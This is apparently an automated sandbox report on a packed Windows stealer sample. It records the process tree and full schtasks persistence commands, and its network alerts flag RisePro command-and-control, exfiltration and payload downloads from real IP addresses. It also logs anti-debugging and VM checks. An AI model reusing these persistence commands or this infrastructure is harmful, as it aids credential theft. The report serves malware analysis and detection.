Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Feb. 20, 2024, 7:51 a.m.	Feb. 20, 2024, 7:53 a.m.

Size	2.3MB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`4698ad48c64750c5eb431f00e27dfb8f`
SHA256	`d6dd8e1665f56bd6fe0f84af74d5f647f6b839b53467ad9c01288c6a6673f9e6`
CRC32	`686095CC`
ssdeep	`49152:hQuzfd1pUPALeftwHL1STPuAdwGFGB8QTsEVLYt:nbvq2ex9dwn1DL4`
Yara	IsPE32 - (no description) PE_Header_Zero - PE File Signature UPX_Zero - UPX packed file

reals.exe "C:\Users\test22\AppData\Local\Temp\reals.exe"
2540
- schtasks.exe schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
  2760
- schtasks.exe schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
  2844
- schtasks.exe schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 HR" /sc HOURLY /rl HIGHEST
  3016
- schtasks.exe schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 LG" /sc ONLOGON /rl HIGHEST
  744
- lAJtUcYyKh8w3igUMaur.exe "C:\Users\test22\AppData\Local\Temp\heidigqzjATjkZOIO\lAJtUcYyKh8w3igUMaur.exe"
  2108
  - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://www.youtube.com
    1156
    - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef3e8f1e8,0x7fef3e8f1f8,0x7fef3e8f208
      3300
    - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=916 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6
      3624
  - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://www.facebook.com/video
    2272
    - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef3e8f1e8,0x7fef3e8f1f8,0x7fef3e8f208
      3344
    - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2276 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6
      3744
  - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://accounts.google.com
    3172
    - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef3e8f1e8,0x7fef3e8f1f8,0x7fef3e8f208
      3548
    - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=3192 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6
      532
  - firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
    3472
    - firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
      3952
  - firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/video
    3836
    - firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/video
      2176
  - firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com
    772
    - firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com
      3212
- f37pbXDbFY0Z2LnYvlpz.exe "C:\Users\test22\AppData\Local\Temp\heidigqzjATjkZOIO\f37pbXDbFY0Z2LnYvlpz.exe"
  2816
- 89S7AqN8sq8AdM4Oot2T.exe "C:\Users\test22\AppData\Local\Temp\heidigqzjATjkZOIO\89S7AqN8sq8AdM4Oot2T.exe"
  1892
- qGDDcS3d5pQc8FHSfMi3.exe "C:\Users\test22\AppData\Local\Temp\heidigqzjATjkZOIO\qGDDcS3d5pQc8FHSfMi3.exe"
  2992
  - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://accounts.google.com
    3060
    - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef3e8f1e8,0x7fef3e8f1f8,0x7fef3e8f208
      2192
    - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=604 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6
      1332
- DOepsJkkm0E916Tb0AAa.exe "C:\Users\test22\AppData\Local\Temp\heidigqzjATjkZOIO\DOepsJkkm0E916Tb0AAa.exe"
  936
explorer.exe C:\Windows\Explorer.EXE
1452

Name	Response	Post-Analysis Lookup
ssl.gstatic.com	A 172.217.24.67	172.217.161.195
accounts.google.com	A 74.125.23.84	64.233.188.84
ipinfo.io	A 34.117.186.192	34.117.186.192
www.google.com	A 142.251.220.4	142.250.206.228
db-ip.com	A 104.26.5.15 A 104.26.4.15 A 172.67.75.166	104.26.5.15

IP Address	Status	Action
104.26.5.15	Active	Moloch
117.18.232.200	Active	Moloch
142.251.220.4	Active	Moloch
164.124.101.2	Active	Moloch
172.217.24.67	Active	Moloch
185.215.113.46	Active	Moloch
193.233.132.62	Active	Moloch
34.117.186.192	Active	Moloch
74.125.23.84	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49165 -> 193.233.132.62:50500	2049060	ET MALWARE RisePro TCP Heartbeat Packet	A Network Trojan was detected
TCP 193.233.132.62:50500 -> 192.168.56.101:49165	2046266	ET MALWARE [ANY.RUN] RisePro TCP (Token)	A Network Trojan was detected
TCP 193.233.132.62:50500 -> 192.168.56.101:49165	2046267	ET MALWARE [ANY.RUN] RisePro TCP (External IP)	A Network Trojan was detected
TCP 192.168.56.101:49165 -> 193.233.132.62:50500	2046270	ET MALWARE [ANY.RUN] RisePro TCP (Exfiltration)	A Network Trojan was detected
TCP 192.168.56.101:49165 -> 193.233.132.62:50500	2049661	ET MALWARE RisePro CnC Activity (Inbound)	A Network Trojan was detected
TCP 185.215.113.46:80 -> 192.168.56.101:49176	2400021	ET DROP Spamhaus DROP Listed Traffic Inbound group 22	Misc Attack
TCP 192.168.56.101:49176 -> 185.215.113.46:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49176 -> 185.215.113.46:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 192.168.56.101:49176 -> 185.215.113.46:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49176 -> 185.215.113.46:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 192.168.56.101:49165 -> 193.233.132.62:50500	2046269	ET MALWARE [ANY.RUN] RisePro TCP (Activity)	A Network Trojan was detected
TCP 185.215.113.46:80 -> 192.168.56.101:49176	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.215.113.46:80 -> 192.168.56.101:49176	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49183 -> 74.125.23.84:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49166 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49166 -> 34.117.186.192:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49166 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49182 -> 74.125.23.84:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49184 -> 172.217.24.67:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49190 -> 142.251.220.4:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49168 -> 104.26.5.15:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49185 -> 172.217.24.67:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49176 -> 185.215.113.46:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49176 -> 185.215.113.46:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 185.215.113.46:80 -> 192.168.56.101:49176	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49176 -> 185.215.113.46:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 185.215.113.46:80 -> 192.168.56.101:49176	2014819	ET INFO Packed Executable Download	Misc activity
TCP 192.168.56.101:49176 -> 185.215.113.46:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49189 -> 142.251.220.4:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49176 -> 185.215.113.46:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49176 -> 185.215.113.46:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 193.233.132.62:50500 -> 192.168.56.101:49202	2046266	ET MALWARE [ANY.RUN] RisePro TCP (Token)	A Network Trojan was detected
TCP 193.233.132.62:50500 -> 192.168.56.101:49201	2046266	ET MALWARE [ANY.RUN] RisePro TCP (Token)	A Network Trojan was detected
TCP 192.168.56.101:49203 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49203 -> 34.117.186.192:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49203 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49208 -> 104.26.5.15:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49205 -> 104.26.5.15:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49201 -> 193.233.132.62:50500	2049060	ET MALWARE RisePro TCP Heartbeat Packet	A Network Trojan was detected
TCP 192.168.56.101:49275 -> 117.18.232.200:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49280 -> 117.18.232.200:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49276 -> 117.18.232.200:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49206 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49206 -> 34.117.186.192:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49206 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 117.18.232.200:443 -> 192.168.56.101:49281	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.101:49206 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49176 -> 185.215.113.46:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49176 -> 185.215.113.46:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49165 -> 193.233.132.62:50500	2049661	ET MALWARE RisePro CnC Activity (Inbound)	A Network Trojan was detected
TCP 117.18.232.200:443 -> 192.168.56.101:49277	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.101:49278 -> 117.18.232.200:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49166 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49206 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49203 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.101:49183 74.125.23.84:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=accounts.google.com	22:f1:10:1f:49:c5:97:f4:85:76:5a:20:dd:85:7c:ff:e2:c9:2a:1f
TLSv1 192.168.56.101:49182 74.125.23.84:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=accounts.google.com	22:f1:10:1f:49:c5:97:f4:85:76:5a:20:dd:85:7c:ff:e2:c9:2a:1f
TLSv1 192.168.56.101:49184 172.217.24.67:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.gstatic.com	f1:41:dd:4f:a6:9f:7b:ae:ae:af:78:bd:08:f8:c8:40:3c:c4:8c:93
TLSv1 192.168.56.101:49190 142.251.220.4:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=www.google.com	2a:14:a8:9a:ea:5b:44:20:c3:ae:90:ff:4d:2f:4c:22:15:54:f9:7c
TLSv1 192.168.56.101:49168 104.26.5.15:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5
TLSv1 192.168.56.101:49185 172.217.24.67:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.gstatic.com	f1:41:dd:4f:a6:9f:7b:ae:ae:af:78:bd:08:f8:c8:40:3c:c4:8c:93
TLSv1 192.168.56.101:49189 142.251.220.4:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=www.google.com	2a:14:a8:9a:ea:5b:44:20:c3:ae:90:ff:4d:2f:4c:22:15:54:f9:7c
TLSv1 192.168.56.101:49208 104.26.5.15:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5
TLSv1 192.168.56.101:49205 104.26.5.15:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5

Queries for the computername (8 events)

Time & API	Arguments	Status	Return
GetComputerNameA Feb. 20, 2024, 7:51 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 20, 2024, 7:51 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 20, 2024, 7:51 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 20, 2024, 7:51 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 20, 2024, 7:51 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 20, 2024, 7:51 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 20, 2024, 7:51 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Feb. 20, 2024, 7:52 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (50 out of 100 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Feb. 20, 2024, 7:51 a.m.			0	0
IsDebuggerPresent Feb. 20, 2024, 7:51 a.m.			0	0
IsDebuggerPresent Feb. 20, 2024, 7:51 a.m.			0	0
IsDebuggerPresent Feb. 20, 2024, 7:51 a.m.			0	0
IsDebuggerPresent Feb. 20, 2024, 7:51 a.m.			0	0
IsDebuggerPresent Feb. 20, 2024, 7:51 a.m.			0	0
IsDebuggerPresent Feb. 20, 2024, 7:51 a.m.			0	0
IsDebuggerPresent Feb. 20, 2024, 7:51 a.m.			0	0
IsDebuggerPresent Feb. 20, 2024, 7:51 a.m.			0	0
IsDebuggerPresent Feb. 20, 2024, 7:51 a.m.			0	0
IsDebuggerPresent Feb. 20, 2024, 7:51 a.m.			0	0
IsDebuggerPresent Feb. 20, 2024, 7:51 a.m.			0	0
IsDebuggerPresent Feb. 20, 2024, 7:51 a.m.			0	0
IsDebuggerPresent Feb. 20, 2024, 7:52 a.m.			0	0
IsDebuggerPresent Feb. 20, 2024, 7:52 a.m.			0	0
IsDebuggerPresent Feb. 20, 2024, 7:52 a.m.			0	0
IsDebuggerPresent Feb. 20, 2024, 7:52 a.m.			0	0
IsDebuggerPresent Feb. 20, 2024, 7:52 a.m.			0	0
IsDebuggerPresent Feb. 20, 2024, 7:52 a.m.			0	0
IsDebuggerPresent Feb. 20, 2024, 7:51 a.m.			0	0
IsDebuggerPresent Feb. 20, 2024, 7:51 a.m.			0	0
IsDebuggerPresent Feb. 20, 2024, 7:52 a.m.			0	0
IsDebuggerPresent Feb. 20, 2024, 7:52 a.m.			0	0
IsDebuggerPresent Feb. 20, 2024, 7:52 a.m.			0	0
IsDebuggerPresent Feb. 20, 2024, 7:52 a.m.			0	0
IsDebuggerPresent Feb. 20, 2024, 7:52 a.m.			0	0
IsDebuggerPresent Feb. 20, 2024, 7:52 a.m.			0	0
IsDebuggerPresent Feb. 20, 2024, 7:52 a.m.			0	0
IsDebuggerPresent Feb. 20, 2024, 7:52 a.m.			0	0
IsDebuggerPresent Feb. 20, 2024, 7:52 a.m.			0	0
IsDebuggerPresent Feb. 20, 2024, 7:52 a.m.			0	0
IsDebuggerPresent Feb. 20, 2024, 7:52 a.m.			0	0
IsDebuggerPresent Feb. 20, 2024, 7:52 a.m.			0	0
IsDebuggerPresent Feb. 20, 2024, 7:52 a.m.			0	0
IsDebuggerPresent Feb. 20, 2024, 7:52 a.m.			0	0
IsDebuggerPresent Feb. 20, 2024, 7:52 a.m.			0	0
IsDebuggerPresent Feb. 20, 2024, 7:52 a.m.			0	0
IsDebuggerPresent Feb. 20, 2024, 7:52 a.m.			0	0
IsDebuggerPresent Feb. 20, 2024, 7:52 a.m.			0	0
IsDebuggerPresent Feb. 20, 2024, 7:52 a.m.			0	0
IsDebuggerPresent Feb. 20, 2024, 7:52 a.m.			0	0
IsDebuggerPresent Feb. 20, 2024, 7:52 a.m.			0	0
IsDebuggerPresent Feb. 20, 2024, 7:52 a.m.			0	0
IsDebuggerPresent Feb. 20, 2024, 7:52 a.m.			0	0
IsDebuggerPresent Feb. 20, 2024, 7:52 a.m.			0	0
IsDebuggerPresent Feb. 20, 2024, 7:52 a.m.			0	0
IsDebuggerPresent Feb. 20, 2024, 7:52 a.m.			0	0
IsDebuggerPresent Feb. 20, 2024, 7:52 a.m.			0	0
IsDebuggerPresent Feb. 20, 2024, 7:52 a.m.			0	0
IsDebuggerPresent Feb. 20, 2024, 7:52 a.m.			0	0

Command line console output was observed (4 events)

Time & API	Arguments	Status	Return
WriteConsoleW Feb. 20, 2024, 7:51 a.m.	buffer: SUCCESS: The scheduled task "MPGPH131 HR" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW Feb. 20, 2024, 7:51 a.m.	buffer: SUCCESS: The scheduled task "MPGPH131 LG" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW Feb. 20, 2024, 7:51 a.m.	buffer: SUCCESS: The scheduled task "MSIUpdaterV131 HR" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW Feb. 20, 2024, 7:51 a.m.	buffer: SUCCESS: The scheduled task "MSIUpdaterV131 LG" has successfully been created. console_handle: 0x00000007	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Tries to locate where the browsers are installed (5 events)

file	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
file	C:\Program Files\Mozilla Firefox\api-ms-win-core-file-l2-1-0.dll
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe\PATH
registry	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Feb. 20, 2024, 7:51 a.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (6 events)

section	\x00
section	.idata
section
section	rhfejcgk
section	khoopwui
section	.taggant

One or more processes crashed (50 out of 391 events)

Time & API	Arguments	Status
__exception__ Feb. 20, 2024, 7:51 a.m.	stacktrace: RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: fb e9 4e 01 00 00 60 8b 74 24 24 8b 7c 24 28 fc exception.symbol: reals+0x40c0b9 exception.instruction: sti exception.module: reals.exe exception.exception_code: 0xc0000096 exception.offset: 4243641 exception.address: 0xf5c0b9 registers.esp: 2095176 registers.edi: 0 registers.eax: 1 registers.ebp: 2095192 registers.edx: 17903616 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0	1
__exception__ Feb. 20, 2024, 7:51 a.m.	stacktrace: exception.instruction_r: fb 55 89 14 24 54 5a e9 00 00 00 00 81 c2 04 00 exception.symbol: reals+0x14c6bb exception.instruction: sti exception.module: reals.exe exception.exception_code: 0xc0000096 exception.offset: 1361595 exception.address: 0xc9c6bb registers.esp: 2095140 registers.edi: 1968898280 registers.eax: 27752 registers.ebp: 4003242004 registers.edx: 11862016 registers.ebx: 232 registers.esi: 13221355 registers.ecx: 1969094656	1
__exception__ Feb. 20, 2024, 7:51 a.m.	stacktrace: exception.instruction_r: fb 51 50 b8 f3 b4 2c 1d 89 44 24 04 58 e9 52 00 exception.symbol: reals+0x14bfc6 exception.instruction: sti exception.module: reals.exe exception.exception_code: 0xc0000096 exception.offset: 1359814 exception.address: 0xc9bfc6 registers.esp: 2095144 registers.edi: 1968898280 registers.eax: 27752 registers.ebp: 4003242004 registers.edx: 11862016 registers.ebx: 232 registers.esi: 13249107 registers.ecx: 1969094656	1
__exception__ Feb. 20, 2024, 7:51 a.m.	stacktrace: exception.instruction_r: fb e9 00 00 00 00 51 89 14 24 e9 12 f7 ff ff 81 exception.symbol: reals+0x14c8de exception.instruction: sti exception.module: reals.exe exception.exception_code: 0xc0000096 exception.offset: 1362142 exception.address: 0xc9c8de registers.esp: 2095144 registers.edi: 1968898280 registers.eax: 0 registers.ebp: 4003242004 registers.edx: 239849 registers.ebx: 232 registers.esi: 13224407 registers.ecx: 1969094656	1
__exception__ Feb. 20, 2024, 7:51 a.m.	stacktrace: exception.instruction_r: fb e9 11 00 00 00 87 ea f7 d5 87 ea 81 ea ff ff exception.symbol: reals+0x14d4d4 exception.instruction: sti exception.module: reals.exe exception.exception_code: 0xc0000096 exception.offset: 1365204 exception.address: 0xc9d4d4 registers.esp: 2095140 registers.edi: 13225784 registers.eax: 30146 registers.ebp: 4003242004 registers.edx: 239849 registers.ebx: 110589292 registers.esi: 13224407 registers.ecx: 1015070641	1
__exception__ Feb. 20, 2024, 7:51 a.m.	stacktrace: exception.instruction_r: fb 50 b8 b1 ed f2 57 68 3e 19 90 69 89 14 24 56 exception.symbol: reals+0x14d32a exception.instruction: sti exception.module: reals.exe exception.exception_code: 0xc0000096 exception.offset: 1364778 exception.address: 0xc9d32a registers.esp: 2095144 registers.edi: 13255930 registers.eax: 30146 registers.ebp: 4003242004 registers.edx: 239849 registers.ebx: 110589292 registers.esi: 13224407 registers.ecx: 1015070641	1
__exception__ Feb. 20, 2024, 7:51 a.m.	stacktrace: exception.instruction_r: fb 50 e9 09 fa ff ff 43 81 eb 4b 42 77 7f 53 f7 exception.symbol: reals+0x14db42 exception.instruction: sti exception.module: reals.exe exception.exception_code: 0xc0000096 exception.offset: 1366850 exception.address: 0xc9db42 registers.esp: 2095144 registers.edi: 13229206 registers.eax: 30146 registers.ebp: 4003242004 registers.edx: 239849 registers.ebx: 0 registers.esi: 13224407 registers.ecx: 1259	1
__exception__ Feb. 20, 2024, 7:51 a.m.	stacktrace: exception.instruction_r: fb 53 89 0c 24 e9 7d 00 00 00 89 f7 5e e9 56 00 exception.symbol: reals+0x2d1dc8 exception.instruction: sti exception.module: reals.exe exception.exception_code: 0xc0000096 exception.offset: 2956744 exception.address: 0xe21dc8 registers.esp: 2095144 registers.edi: 13261285 registers.eax: 14844707 registers.ebp: 4003242004 registers.edx: 13218761 registers.ebx: 1269760 registers.esi: 14818186 registers.ecx: 2061893632	1
__exception__ Feb. 20, 2024, 7:51 a.m.	stacktrace: exception.instruction_r: fb 57 68 27 1d 50 52 89 04 24 e9 9e 00 00 00 81 exception.symbol: reals+0x2d27d3 exception.instruction: sti exception.module: reals.exe exception.exception_code: 0xc0000096 exception.offset: 2959315 exception.address: 0xe227d3 registers.esp: 2095144 registers.edi: 0 registers.eax: 14821659 registers.ebp: 4003242004 registers.edx: 3125956688 registers.ebx: 1269760 registers.esi: 14818186 registers.ecx: 2061893632	1
__exception__ Feb. 20, 2024, 7:51 a.m.	stacktrace: exception.instruction_r: fb 53 56 51 b9 a7 bc b5 6f e9 b5 04 00 00 bb fe exception.symbol: reals+0x2d87f4 exception.instruction: sti exception.module: reals.exe exception.exception_code: 0xc0000096 exception.offset: 2983924 exception.address: 0xe287f4 registers.esp: 2095144 registers.edi: 14875081 registers.eax: 30899 registers.ebp: 4003242004 registers.edx: 2217772362 registers.ebx: 1259 registers.esi: 4294939464 registers.ecx: 1995716730	1
__exception__ Feb. 20, 2024, 7:51 a.m.	stacktrace: exception.instruction_r: fb 51 53 bb 41 8e 43 6b c1 eb 03 c1 e3 03 4b f7 exception.symbol: reals+0x2df582 exception.instruction: sti exception.module: reals.exe exception.exception_code: 0xc0000096 exception.offset: 3011970 exception.address: 0xe2f582 registers.esp: 2095140 registers.edi: 3026327 registers.eax: 26627 registers.ebp: 4003242004 registers.edx: 14872452 registers.ebx: 378794641 registers.esi: 4294939464 registers.ecx: 14288	1
